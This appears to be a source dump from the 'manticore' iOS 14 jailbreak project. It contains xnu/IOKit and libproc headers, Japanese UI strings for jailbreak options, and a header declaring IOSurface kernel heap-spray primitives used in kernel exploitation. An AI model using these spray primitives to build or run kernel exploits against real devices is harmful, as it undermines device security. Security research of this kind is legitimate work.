245 | * @discussion Used when a scale_factor parameter is required to define a unit of time.
246 | * @constant kNanosecondScale Scale factor for nanosecond based times.
247 | * @constant kMicrosecondScale Scale factor for microsecond based times.
248 | * @constant kMillisecondScale Scale factor for millisecond based times.
249 | * @constant kTickScale Scale factor for the standard (100Hz) tick.
250 | * @constant kSecondScale Scale factor for second based times. */
251 |
/* Each scale is the number of nanoseconds in one unit of that kind. */
enum {
kNanosecondScale = 1,
kMicrosecondScale = 1000,
kMillisecondScale = 1000 * 1000,
kSecondScale = 1000 * 1000 * 1000,
kTickScale = (kSecondScale / 100)
};
259 |
/* Sentinel size value; where it is honoured (user-client method dispatch) is not shown here. */
enum {
kIOConnectMethodVarOutputSize = -3
};
263 |
264 | /* compatibility types */
265 |
/* Userland-only compatibility alias. */
#ifndef KERNEL

typedef unsigned int IODeviceNumber;

#endif
271 |
272 | #ifdef __cplusplus
273 | }
274 | #endif
275 |
276 | #else /* !PLATFORM_DriverKit */
277 |
278 | #include
279 |
/*
 * DriverKit build: the same names on plain <stdint.h> types. Here the byte
 * count, physical address/length and virtual address are unconditionally
 * 64-bit, unlike the target-dependent selection in the non-DriverKit branch.
 */
typedef uint32_t IOOptionBits;
typedef int32_t IOFixed;
typedef uint32_t IOVersion;
typedef uint32_t IOItemCount;
typedef uint32_t IOCacheMode;

typedef uint32_t IOByteCount32;
typedef uint64_t IOByteCount64;
typedef IOByteCount64 IOByteCount;

typedef uint32_t IOPhysicalAddress32;
typedef uint64_t IOPhysicalAddress64;
typedef uint32_t IOPhysicalLength32;
typedef uint64_t IOPhysicalLength64;

typedef IOPhysicalAddress64 IOPhysicalAddress;
typedef IOPhysicalLength64 IOPhysicalLength;

typedef uint64_t IOVirtualAddress;
299 |
300 | #endif /* PLATFORM_DriverKit */
301 |
/* Maximum tolerated bus stall, in nanoseconds (40usec == 40000). */
enum {
kIOMaxBusStall40usec = 40000,
kIOMaxBusStall30usec = 30000,
kIOMaxBusStall25usec = 25000,
kIOMaxBusStall20usec = 20000,
kIOMaxBusStall10usec = 10000,
kIOMaxBusStall5usec = 5000,
kIOMaxBusStallNone = 0,
};
311 |
312 | #endif /* ! __IOKIT_IOTYPES_H */
313 |
--------------------------------------------------------------------------------
/manticore/include/xnu/iokit/IOKit/OSMessageNotification.h:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright (c) 1998-2000 Apple Computer, Inc. All rights reserved.
3 | *
4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
5 | *
6 | * This file contains Original Code and/or Modifications of Original Code
7 | * as defined in and that are subject to the Apple Public Source License
8 | * Version 2.0 (the 'License'). You may not use this file except in
9 | * compliance with the License. The rights granted to you under the License
10 | * may not be used to create, or enable the creation or redistribution of,
11 | * unlawful or unlicensed copies of an Apple operating system, or to
12 | * circumvent, violate, or enable the circumvention or violation of, any
13 | * terms of an Apple operating system software license agreement.
14 | *
15 | * Please obtain a copy of the License at
16 | * http://www.opensource.apple.com/apsl/ and read it before using this file.
17 | *
18 | * The Original Code and all software distributed under the License are
19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
23 | * Please see the License for the specific language governing rights and
24 | * limitations under the License.
25 | *
26 | * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
27 | */
28 | /*
29 | * Copyright (c) 1999 Apple Computer, Inc. All rights reserved.
30 | *
31 | * HISTORY
32 | *
33 | */
34 |
35 | #ifndef __OS_OSMESSAGENOTIFICATION_H
36 | #define __OS_OSMESSAGENOTIFICATION_H
37 |
38 | #ifdef __cplusplus
39 | extern "C" {
40 | #endif
41 |
42 | #include
43 | #include
44 | #include
45 |
/*
 * IOKit notification message types. The type occupies the low 12 bits
 * (kIOKitNoticationTypeMask); the two bits at shift 30 (mask 3) carry what
 * the name describes as a message-size adjustment. The misspelling
 * "Notication" is upstream Apple and must be kept for source compatibility.
 */
enum {
kFirstIOKitNotificationType = 100,
kIOServicePublishNotificationType = 100,
kIOServiceMatchedNotificationType = 101,
kIOServiceTerminatedNotificationType = 102,
kIOAsyncCompletionNotificationType = 150,
kIOServiceMessageNotificationType = 160,
kLastIOKitNotificationType = 199,

// reserved bits
kIOKitNoticationTypeMask = 0x00000FFF,
kIOKitNoticationTypeSizeAdjShift = 30,
kIOKitNoticationMsgSizeMask = 3,
};
60 |
/* Mach message IDs for notification and async-completion messages, plus the async argument limit. */
enum {
kOSNotificationMessageID = 53,
kOSAsyncCompleteMessageID = 57,
kMaxAsyncArgs = 16
};
66 |
/*
 * Slot layout of an OSAsyncReference. Slot 0 is reserved; async, matching and
 * interest references all place the callout function at slot 1 and its refcon
 * at slot 2, and interest references add the service at slot 3. The *Count
 * enumerators give the number of slots each kind uses.
 */
enum {
kIOAsyncReservedIndex = 0,
kIOAsyncReservedCount,

kIOAsyncCalloutFuncIndex = kIOAsyncReservedCount,
kIOAsyncCalloutRefconIndex,
kIOAsyncCalloutCount,

kIOMatchingCalloutFuncIndex = kIOAsyncReservedCount,
kIOMatchingCalloutRefconIndex,
kIOMatchingCalloutCount,

kIOInterestCalloutFuncIndex = kIOAsyncReservedCount,
kIOInterestCalloutRefconIndex,
kIOInterestCalloutServiceIndex,
kIOInterestCalloutCount
};
84 |
85 |
86 |
87 | // --------------
// 64-bit async reference: eight io_user_reference_t slots, sized in bytes by kOSAsyncRef64Size.
enum {
kOSAsyncRef64Count = 8,
kOSAsyncRef64Size = kOSAsyncRef64Count * ((int) sizeof(io_user_reference_t))
};
typedef io_user_reference_t OSAsyncReference64[kOSAsyncRef64Count];
93 |
/*
 * Wire layout of a 64-bit notification message body. `size` is the byte count
 * of the trailing `content` only, not of the whole structure; `type` is
 * presumably one of the k*NotificationType values above; `reference` carries
 * the OSAsyncReference64 slots. `content` is a flexible array member
 * (zero-length array before C99), so sizeof() excludes it.
 * NOTE(review): nothing here ties `size` to the real Mach message length — a
 * receiver must bound `size` by the message body it actually got before
 * reading `content`.
 */
struct OSNotificationHeader64 {
mach_msg_size_t size; /* content size */
natural_t type;
OSAsyncReference64 reference;

#if defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 199901L)
unsigned char content[];
#else
unsigned char content[0];
#endif
};
105 |
/*
 * 64-bit interest-message payload, packed to 4-byte alignment. messageArgument
 * is declared with one element as a minimum; the real count is presumably
 * derived from the enclosing header's size, not from this declaration.
 */
#pragma pack(4)
struct IOServiceInterestContent64 {
natural_t messageType;
io_user_reference_t messageArgument[1];
};
#pragma pack()
112 | // --------------
113 |
114 | #if !KERNEL_USER32
115 |
/*
 * Legacy natural_t / pointer-based forms of the structures above, compiled
 * out when KERNEL_USER32 is set. kOSAsyncRefSize is hard-coded to 32, i.e.
 * eight 4-byte slots, whereas IOServiceInterestContent's messageArgument is
 * pointer-sized, so the legacy layout depends on the build's pointer width
 * and is not interchangeable with the *64 forms on the wire.
 */
enum {
kOSAsyncRefCount = 8,
kOSAsyncRefSize = 32
};
typedef natural_t OSAsyncReference[kOSAsyncRefCount];

struct OSNotificationHeader {
mach_msg_size_t size; /* content size */
natural_t type;
OSAsyncReference reference;

#if defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 199901L)
unsigned char content[];
#else
unsigned char content[0];
#endif
};

#pragma pack(4)
struct IOServiceInterestContent {
natural_t messageType;
void * messageArgument[1];
};
#pragma pack()
140 |
141 | #endif /* KERNEL_USER32 */
142 |
/*
 * Body of an async-completion message: the IOReturn result followed by a
 * flexible array of pointer-sized args. The packed attribute on `args` drops
 * the alignment padding after `result`, so on LP64 the args presumably start
 * at offset 4 rather than 8 — readers must not assume natural alignment.
 */
struct IOAsyncCompletionContent {
IOReturn result;
#if defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 199901L)
void * args[] __attribute__ ((packed));
#else
void * args[0] __attribute__ ((packed));
#endif
};
151 |
/* C-only convenience aliases so the struct tags can be used without `struct`. */
#ifndef __cplusplus
typedef struct OSNotificationHeader OSNotificationHeader;
typedef struct IOServiceInterestContent IOServiceInterestContent;
typedef struct IOAsyncCompletionContent IOAsyncCompletionContent;
#endif
157 |
158 | #ifdef __cplusplus
159 | }
160 | #endif
161 |
162 | #endif /* __OS_OSMESSAGENOTIFICATION_H */
163 |
--------------------------------------------------------------------------------
/manticore/include/xnu/libsyscall/wrappers/libproc/libproc.h:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright (c) 2006, 2007, 2010 Apple Inc. All rights reserved.
3 | *
4 | * @APPLE_LICENSE_HEADER_START@
5 | *
6 | * This file contains Original Code and/or Modifications of Original Code
7 | * as defined in and that are subject to the Apple Public Source License
8 | * Version 2.0 (the 'License'). You may not use this file except in
9 | * compliance with the License. Please obtain a copy of the License at
10 | * http://www.opensource.apple.com/apsl/ and read it before using this
11 | * file.
12 | *
13 | * The Original Code and all software distributed under the License are
14 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
15 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
16 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
17 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
18 | * Please see the License for the specific language governing rights and
19 | * limitations under the License.
20 | *
21 | * @APPLE_LICENSE_HEADER_END@
22 | */
23 | #ifndef _LIBPROC_H_
24 | #define _LIBPROC_H_
25 |
26 | #include
27 | #include
28 | #include
29 | #include
30 | #include
31 | #include
32 | #include
33 | #include
34 | #include /* for audit_token_t */
35 |
36 | #include
37 |
38 | #include
39 | #include
40 |
41 | /*
42 | * This header file contains private interfaces to obtain process information.
43 | * These interfaces are subject to change in future releases.
44 | */
45 |
/* Bit flags for the pathflags argument of proc_listpidspath(); they may be OR'd together. */

/*!
 * @define PROC_LISTPIDSPATH_PATH_IS_VOLUME
 * @discussion This flag indicates that all processes that hold open
 * file references on the volume associated with the specified
 * path should be returned.
 */
#define PROC_LISTPIDSPATH_PATH_IS_VOLUME 1


/*!
 * @define PROC_LISTPIDSPATH_EXCLUDE_EVTONLY
 * @discussion This flag indicates that file references that were opened
 * with the O_EVTONLY flag should be excluded from the matching
 * criteria.
 */
#define PROC_LISTPIDSPATH_EXCLUDE_EVTONLY 2
62 |
63 | __BEGIN_DECLS
64 |
65 |
/*!
 * @function proc_listpidspath
 * @discussion A function which will search through the current
 * processes looking for open file references which match
 * a specified path or volume.
 * @param type types of processes to be searched (see proc_listpids)
 * @param typeinfo adjunct information for type
 * @param path file or volume path
 * @param pathflags flags to control which files should be considered
 * during the process search.
 * @param buffer a C array of int-sized values to be filled with
 * process identifiers that hold an open file reference
 * matching the specified path or volume. Pass NULL to
 * obtain the minimum buffer size needed to hold the
 * currently active processes.
 * @param buffersize the size (in bytes) of the provided buffer.
 * @result the number of bytes of data returned in the provided buffer;
 * -1 if an error was encountered;
 */
int proc_listpidspath(uint32_t type,
uint32_t typeinfo,
const char *path,
uint32_t pathflags,
void *buffer,
int buffersize) __OSX_AVAILABLE_STARTING(__MAC_10_5, __IPHONE_2_0);

/*
 * Further process-information queries. Each takes a caller buffer and its
 * size in bytes (as `int` or `uint32_t`, depending on the call). The
 * documented contract above — returns the number of bytes written, or -1 on
 * error — is presumed to hold for these as well; confirm per call.
 * Callers must test for -1 before using the return value as a length, and
 * should derive buffersize from sizeof() of the output struct they pass.
 * NOTE(review): for proc_name/proc_pidpath/proc_regionfilename, whether the
 * output is NUL-terminated when the buffer is too small is not established
 * here — treat the return value as the length rather than relying on a
 * terminator.
 */
int proc_listpids(uint32_t type, uint32_t typeinfo, void *buffer, int buffersize) __OSX_AVAILABLE_STARTING(__MAC_10_5, __IPHONE_2_0);
int proc_listallpids(void * buffer, int buffersize) __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_4_1);
int proc_listpgrppids(pid_t pgrpid, void * buffer, int buffersize) __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_4_1);
int proc_listchildpids(pid_t ppid, void * buffer, int buffersize) __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_4_1);
int proc_pidinfo(int pid, int flavor, uint64_t arg, void *buffer, int buffersize) __OSX_AVAILABLE_STARTING(__MAC_10_5, __IPHONE_2_0);
int proc_pidfdinfo(int pid, int fd, int flavor, void * buffer, int buffersize) __OSX_AVAILABLE_STARTING(__MAC_10_5, __IPHONE_2_0);
int proc_pidfileportinfo(int pid, uint32_t fileport, int flavor, void *buffer, int buffersize) __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_4_3);
int proc_name(int pid, void * buffer, uint32_t buffersize) __OSX_AVAILABLE_STARTING(__MAC_10_5, __IPHONE_2_0);
int proc_regionfilename(int pid, uint64_t address, void * buffer, uint32_t buffersize) __OSX_AVAILABLE_STARTING(__MAC_10_5, __IPHONE_2_0);
int proc_kmsgbuf(void * buffer, uint32_t buffersize) __OSX_AVAILABLE_STARTING(__MAC_10_5, __IPHONE_2_0);
int proc_pidpath(int pid, void * buffer, uint32_t buffersize) __OSX_AVAILABLE_STARTING(__MAC_10_5, __IPHONE_2_0);
/* Same as proc_pidpath but identifies the target by audit token rather than pid. */
int proc_pidpath_audittoken(audit_token_t *audittoken, void * buffer, uint32_t buffersize) API_AVAILABLE(macos(10.16), ios(14.0), watchos(7.0), tvos(14.0));
int proc_libversion(int *major, int * minor) __OSX_AVAILABLE_STARTING(__MAC_10_5, __IPHONE_2_0);
105 |
/*
 * Return resource usage information for the given pid, which can be a live process or a zombie.
 * `flavor` selects the rusage_info variant written through `buffer`.
 *
 * Returns 0 on success; or -1 on failure, with errno set to indicate the specific error.
 */
int proc_pid_rusage(int pid, int flavor, rusage_info_t *buffer) __OSX_AVAILABLE_STARTING(__MAC_10_9, __IPHONE_7_0);
112 |
/*
 * A process can use the following api to set its own process control
 * state on resource starvation. The argument can have one of the PROC_SETPC_XX values
 */
#define PROC_SETPC_NONE 0
#define PROC_SETPC_THROTTLEMEM 1
#define PROC_SETPC_SUSPEND 2
#define PROC_SETPC_TERMINATE 3

/*
 * NOTE(review): proc_setpcontrol is declared twice, the second time without
 * the availability attribute. This duplicate is present in upstream xnu as
 * well and is harmless as a compatible redeclaration; drop the second line
 * if a compiler warns about the mismatched availability.
 */
int proc_setpcontrol(const int control) __OSX_AVAILABLE_STARTING(__MAC_10_6, __IPHONE_3_2);
int proc_setpcontrol(const int control);
124 |
/* Dirty-state tracking for a pid; `flags` semantics are not described in this header. */
int proc_track_dirty(pid_t pid, uint32_t flags);
int proc_set_dirty(pid_t pid, bool dirty);
int proc_get_dirty(pid_t pid, uint32_t *flags);
int proc_clear_dirty(pid_t pid, uint32_t flags);

/* Terminate `pid`; `sig` is an output (pointer) — presumably the signal used — confirm against the implementation. */
int proc_terminate(pid_t pid, int *sig);
131 |
/*
 * NO_SMT means that on an SMT CPU, this thread must be scheduled alone,
 * with the paired CPU idle.
 *
 * Set NO_SMT on the current proc (all existing and future threads)
 * This attribute is inherited on fork and exec
 */
int proc_set_no_smt(void) __API_AVAILABLE(macos(10.16));

/* Set NO_SMT on the current thread */
int proc_setthread_no_smt(void) __API_AVAILABLE(macos(10.16));

/*
 * CPU Security Mitigation APIs
 *
 * Set CPU security mitigation on the current proc (all existing and future threads)
 * This attribute is inherited on fork and exec
 */
int proc_set_csm(uint32_t flags) __API_AVAILABLE(macos(10.16));

/* Set CPU security mitigation on the current thread */
int proc_setthread_csm(uint32_t flags) __API_AVAILABLE(macos(10.16));

/*
 * flags for CPU Security Mitigation APIs
 * PROC_CSM_ALL should be used in most cases,
 * the individual flags are provided only for performance evaluation etc.
 * These are macOS-only entry points (see the availability attributes above);
 * they are not expected to be callable on the iOS targets this project builds for.
 */
#define PROC_CSM_ALL 0x0001 /* Set all available mitigations */
#define PROC_CSM_NOSMT 0x0002 /* Set NO_SMT - see above */
#define PROC_CSM_TECS 0x0004 /* Execute VERW on every return to user mode */
163 |
164 | #ifdef PRIVATE
165 | #include
/*
 * Enumerate potential userspace pointers embedded in kernel data structures.
 * Currently inspects kqueues only.
 *
 * NOTE: returned "pointers" are opaque user-supplied values and thus not
 * guaranteed to address valid objects or be pointers at all.
 *
 * Returns the number of pointers found (which may exceed buffersize), or -1 on
 * failure and errno set appropriately. Because the count can exceed
 * buffersize, callers must clamp to buffersize before reading the buffer.
 */
int proc_list_uptrs(pid_t pid, uint64_t *buffer, uint32_t buffersize);

/* Dynamic kqueue enumeration/inspection; PRIVATE-only, like proc_list_uptrs. */
int proc_list_dynkqueueids(int pid, kqueue_id_t *buf, uint32_t bufsz);
int proc_piddynkqueueinfo(int pid, int flavor, kqueue_id_t kq_id, void *buffer,
int buffersize);
181 | #endif /* PRIVATE */
182 |
/* Per-process user-data query; the meaning of `flavor` is not documented in this header. */
int proc_udata_info(int pid, int flavor, void *buffer, int buffersize);
184 |
185 | __END_DECLS
186 |
187 | #endif /*_LIBPROC_H_ */
188 |
--------------------------------------------------------------------------------
/manticore/include/xnu/mach_vm.h:
--------------------------------------------------------------------------------
1 | //
2 | // mach_vm.h
3 | // manticore
4 | //
5 | // Created by Luca on 10.03.21.
6 | //
7 |
8 | #ifndef mach_vm_h
9 | #define mach_vm_h
10 | // Prototypes from mach/mach_vm.h
11 |
12 | #include
13 |
/*
 * Hand-written prototypes for three mach_vm calls (the comment above says they
 * mirror mach/mach_vm.h, which the SDK this project builds against presumably
 * does not expose). They are plain extern declarations: nothing checks them
 * against the real header, so any drift from the libsystem_kernel export
 * signature becomes a silent ABI mismatch at the call site.
 *
 * target: the task (vm_map_t) whose address space is affected.
 * address: in/out — requested address, updated to the chosen address.
 */
extern
kern_return_t mach_vm_allocate
(
vm_map_t target,
mach_vm_address_t *address,
mach_vm_size_t size,
int flags
);

extern
kern_return_t mach_vm_deallocate
(
vm_map_t target,
mach_vm_address_t address,
mach_vm_size_t size
);

/*
 * address/size are in/out (the region containing *address is reported back);
 * infoCnt is presumably the capacity of `info` on entry and the count written
 * on return, per Mach convention — confirm against the real header.
 */
extern
kern_return_t mach_vm_region
(
vm_map_t target_task,
mach_vm_address_t *address,
mach_vm_size_t *size,
vm_region_flavor_t flavor,
vm_region_info_t info,
mach_msg_type_number_t *infoCnt,
mach_port_t *object_name
);
42 |
43 | #endif
44 |
--------------------------------------------------------------------------------
/manticore/ja.lproj/LaunchScreen.strings:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/manticore/ja.lproj/Main.strings:
--------------------------------------------------------------------------------
1 |
2 | /* Class = "UILabel"; text = "Manticore"; ObjectID = "0il-tf-sNa"; */
3 | "0il-tf-sNa.text" = "Manticore";
4 |
5 | /* Class = "UILabel"; text = "Set APNonce"; ObjectID = "0yi-4F-L8u"; */
6 | "0yi-4F-L8u.text" = "APNonceをセット";
7 |
8 | /* Class = "UILabel"; text = "Enable Tweaks"; ObjectID = "2Nf-dY-FJy"; */
9 | "2Nf-dY-FJy.text" = "Tweaksの有効化";
10 |
11 | /* Class = "UIButton"; normalTitle = "Jailbreak"; ObjectID = "6hM-Fc-FDp"; */
12 | "6hM-Fc-FDp.normalTitle" = "脱獄";
13 |
14 | /* Class = "UILabel"; text = "Restore RootFS"; ObjectID = "AVZ-qX-0ms"; */
15 | "AVZ-qX-0ms.text" = "RootFSの復元";
16 |
17 | /* Class = "UIButton"; normalTitle = "Jailbreak"; ObjectID = "B09-wX-UeI"; */
18 | "B09-wX-UeI.normalTitle" = "脱獄";
19 |
20 | /* Class = "UITextField"; placeholder = "0x1111111111111111"; ObjectID = "JaD-0s-nbo"; */
21 | "JaD-0s-nbo.placeholder" = "0x1111111111111111";
22 |
23 | /* Class = "UILabel"; text = "iOS 14.0 - 14.3"; ObjectID = "Kda-OK-gFg"; */
24 | "Kda-OK-gFg.text" = "iOS 14.0 - 14.3";
25 |
26 | /* Class = "UIButton"; normalTitle = "Save & Set APNonce"; ObjectID = "WEh-zy-xS5"; */
27 | "WEh-zy-xS5.normalTitle" = "APNonceの保存 & セット";
28 |
29 | /* Class = "UIButton"; normalTitle = "Options"; ObjectID = "czz-vo-cHF"; */
30 | "czz-vo-cHF.normalTitle" = "設定";
31 |
32 | /* Class = "UILabel"; text = "Block OTA Updates"; ObjectID = "efL-nQ-xsh"; */
33 | "efL-nQ-xsh.text" = "OTAアップデートの無効化";
34 |
35 | /* Class = "UILabel"; text = "Compatibility"; ObjectID = "i1H-yX-3n8"; */
36 | "i1H-yX-3n8.text" = "互換性";
37 |
38 | /* Class = "UILabel"; text = "Remove ScreenTime"; ObjectID = "kyq-MK-M3C"; */
39 | "kyq-MK-M3C.text" = "スクリーンタイムの無効化";
40 |
41 | /* Class = "UILabel"; text = "Manticore"; ObjectID = "mUJ-nK-XHv"; */
42 | "mUJ-nK-XHv.text" = "Manticore";
43 |
44 | /* Class = "UILabel"; text = "Your iPhone 11 Pro on iOS 14.3 is compatible with Manticore!"; ObjectID = "o5h-H3-igh"; */
45 | "o5h-H3-igh.text" = "iOS 14.3のiPhone11は互換性があります!";
46 |
47 | /* Class = "UITextView"; text = "Lorem ipsum dolor sit er elit lamet, consectetaur cillium adipisicing pecu, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum. Nam liber te conscient to factor tum poen legum odioque civiuda."; ObjectID = "oZg-Pf-ew7"; */
48 | "oZg-Pf-ew7.text" = "Lorem ipsum dolor sit er elit lamet, consectetaur cillium adipisicing pecu, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum. Nam liber te conscient to factor tum poen legum odioque civiuda.";
49 |
50 | /* Class = "UILabel"; text = "Log ECID"; ObjectID = "voS-Ev-D3K"; */
51 | "voS-Ev-D3K.text" = "ECIDを記録する";
52 |
53 | /* Class = "UILabel"; text = "iOS 14.0 - 14.3"; ObjectID = "xtR-ck-MtY"; */
54 | "xtR-ck-MtY.text" = "iOS 14.0 - 14.3";
55 |
56 | /* Class = "UILabel"; text = "Toggle Log Window"; ObjectID = "yiE-wg-tPU"; */
57 | "yiE-wg-tPU.text" = "ログ画面の切り替え";
--------------------------------------------------------------------------------
/manticore/lib/Bazad/IOSurface.h:
--------------------------------------------------------------------------------
1 | /*
2 | * iosurface.h
3 | * Brandon Azad
4 | */
5 | #ifndef VOUCHER_SWAP__IOSURFACE_H_
6 | #define VOUCHER_SWAP__IOSURFACE_H_
7 |
8 | #include
9 | #include
10 | #include
11 | #include
12 | #include
13 | #include
14 | #include "../IOKit/IOKitLib.h"
15 |
16 | #include "exploit_utilities.h"
17 |
/*
 * If the including translation unit defines IOSURFACE_EXTERN, every `extern`
 * below is rewritten to it for the remainder of this header, turning the
 * declarations into definitions in that one TU. The macro is removed by the
 * #undef at the end of the file; no standard headers are included after this
 * point, which is what keeps the keyword rewrite harmless.
 */
#ifdef IOSURFACE_EXTERN
#define extern IOSURFACE_EXTERN
#endif
21 |
// The IOSurfaceRoot service (Mach port).
extern mach_port_t IOSurfaceRoot;

// An IOSurfaceRootUserClient instance (Mach port) opened on that service.
extern mach_port_t IOSurfaceRootUserClient;

// The ID of the IOSurface we're using.
extern uint32_t IOSurface_id;
/* Option bit requesting the binary OSSerialize format. */
enum {
kIOCFSerializeToBinary = 0x00000001U,
};

/* Leading word of a binary-serialized blob; identical in value to kOSSerializeMagic below. */
#define kOSSerializeBinarySignature 0x000000D3U

/*
 * Binary OSSerialize tags. Each 32-bit word packs the object type in bits
 * 24-30 (kOSSerializeTypeMask), a 24-bit payload field (kOSSerializeDataMask),
 * and the end-of-collection flag in bit 31 (kOSSerializeEndCollection).
 * NOTE(review): manticore/lib/pattern_f/iosurface.c defines an enum with these
 * same enumerator names; a translation unit that pulls in both will not compile.
 */
enum {
kOSSerializeDictionary = 0x01000000U,
kOSSerializeArray = 0x02000000U,
kOSSerializeSet = 0x03000000U,
kOSSerializeNumber = 0x04000000U,
kOSSerializeSymbol = 0x08000000U,
kOSSerializeString = 0x09000000U,
kOSSerializeData = 0x0a000000U,
kOSSerializeBoolean = 0x0b000000U,
kOSSerializeObject = 0x0c000000U,

kOSSerializeTypeMask = 0x7F000000U,
kOSSerializeDataMask = 0x00FFFFFFU,

kOSSerializeEndCollection = 0x80000000U,

kOSSerializeMagic = 0x000000d3U,
};
54 |
/*
 * IOSurface_init
 *
 * Description:
 * 	Initialize the IOSurface subsystem (the IOSurfaceRoot/IOSurfaceRootUserClient
 * 	ports and IOSurface_id declared above). Returns false on failure.
 */
bool IOSurface_init(void);

/*
 * IOSurface_deinit
 *
 * Description:
 * 	Tear down the IOSurface subsystem. Any sprayed memory will be automatically deallocated.
 */
void IOSurface_deinit(void);

/*
 * IOSurface_spray_with_gc
 *
 * Description:
 * 	Spray kernel memory using IOSurface properties.
 *
 * 	The current implementation stores each data allocation in an OSString. The reason for this
 * 	is that OSString contents will be allocated using kalloc() even for allocations larger than
 * 	the page size. OSData on the other hand will use kmem_alloc() for large allocations.
 * 	Consequently, the last byte of data will be zeroed out to create a null terminator.
 *
 * 	The callback (a block) is invoked per element with the buffer to fill before
 * 	it is sent; the last byte of each element is not under the caller's control
 * 	for the reason given above.
 */
bool IOSurface_spray_with_gc(uint32_t array_count, uint32_t array_length,
void *data, uint32_t data_size,
void (^callback)(uint32_t array_id, uint32_t data_id, void *data, size_t size));

/*
 * IOSurface_spray_size_with_gc
 *
 * Description:
 * 	Spray kernel memory using IOSurface properties.
 *
 * 	This function computes the number of elements per array automatically.
 */
bool IOSurface_spray_size_with_gc(uint32_t array_count, size_t spray_size,
void *data, uint32_t data_size,
void (^callback)(uint32_t array_id, uint32_t data_id, void *data, size_t size));

/*
 * IOSurface_spray_read_array
 *
 * Description:
 * 	Read back the data elements in a particular array in a particular IOSurface spray.
 */
bool IOSurface_spray_read_array(uint32_t array_id, uint32_t array_length, uint32_t data_size,
void (^callback)(uint32_t data_id, void *data, size_t size));

/*
 * IOSurface_spray_read_all_data
 *
 * Description:
 * 	Read back all the data elements in an IOSurface spray.
 */
bool IOSurface_spray_read_all_data(uint32_t array_count, uint32_t array_length, uint32_t data_size,
void (^callback)(uint32_t array_id, uint32_t data_id, void *data, size_t size));

/*
 * IOSurface_spray_remove_array
 *
 * Description:
 * 	Remove a particular array from an IOSurface spray, freeing the contained data elements.
 */
bool IOSurface_spray_remove_array(uint32_t array_id);

/*
 * IOSurface_spray_clear
 *
 * Description:
 * 	Remove all the arrays from an IOSurface spray, freeing all the data elements.
 */
bool IOSurface_spray_clear(uint32_t array_count);
131 |
132 | // ---- IOSurface types ---------------------------------------------------------------------------
133 |
/*
 * Input structure for the IOSurfaceRootUserClient fast-path surface creation
 * call. Field meanings follow the names; which of them the kernel validates is
 * not established here.
 */
struct _IOSurfaceFastCreateArgs {
uint64_t address;
uint32_t width;
uint32_t height;
uint32_t pixel_format;
uint32_t bytes_per_element;
uint32_t bytes_per_row;
uint32_t alloc_size;
};
143 |
/*
 * Output structure of the fast-path create call: three 64-bit addresses, the
 * new surface ID at offset 0x18, and padding up to a total of 0xdd0 bytes.
 * NOTE(review): the copy of this struct in manticore/lib/pattern_f/iosurface.c
 * pads to 0xf60 instead, so the two libraries disagree on the output size the
 * kernel expects. Only one can be right for a given iOS build; confirm which
 * one the selected target uses, since a size mismatch fails the call and
 * leaves surface_id unset.
 */
struct IOSurfaceLockResult {
uint64_t addr1;
uint64_t addr2;
uint64_t addr3;
uint32_t surface_id;
uint8_t _pad2[0xdd0-0x18-0x4];
};
151 |
/*
 * Input to the set_value call: the surface ID, one further word, then either a
 * serialized property blob (xml) or a raw string, overlaid through zero-length
 * arrays (a GNU extension). sizeof() this struct is 8; the real byte count
 * is passed separately as args_size to IOSurface_set_value.
 */
struct IOSurfaceValueArgs {
uint32_t surface_id;
uint32_t _out1;
union {
uint32_t xml[0];
char string[0];
};
};
160 |
/*
 * Fixed-size variant of IOSurfaceValueArgs: a single 4-byte string_data word
 * followed by one byte, presumably the terminating NUL — confirm against its
 * caller. Note the struct is 13 bytes before tail padding.
 */
struct IOSurfaceValueArgs_string {
uint32_t surface_id;
uint32_t _out1;
uint32_t string_data;
char null;
};
167 |
/* Output structure of the set_value call: a single 32-bit word. */
struct IOSurfaceValueResultArgs {
uint32_t out;
};


/* Send `args_size` bytes of `args` to the set_value external method; returns false on error. */
bool IOSurface_set_value(const struct IOSurfaceValueArgs *args, size_t args_size);
174 |
175 | #undef extern
176 |
177 | #endif
178 |
--------------------------------------------------------------------------------
/manticore/lib/pattern_f/iosurface.c:
--------------------------------------------------------------------------------
1 | /*
2 | * iosurface.c
3 | * Brandon Azad
4 | */
5 |
6 | #include
7 | #include
8 | #include
9 | #include
10 | #include
11 | #include
12 |
13 | #include "IOKitUser/IOKitLib.h"
14 |
15 | #include
16 | #include
17 |
/*
 * Binary OSSerialize tags (type in bits 24-30, 24-bit payload field, end-of-
 * collection flag in bit 31), written here without the U suffix used by the
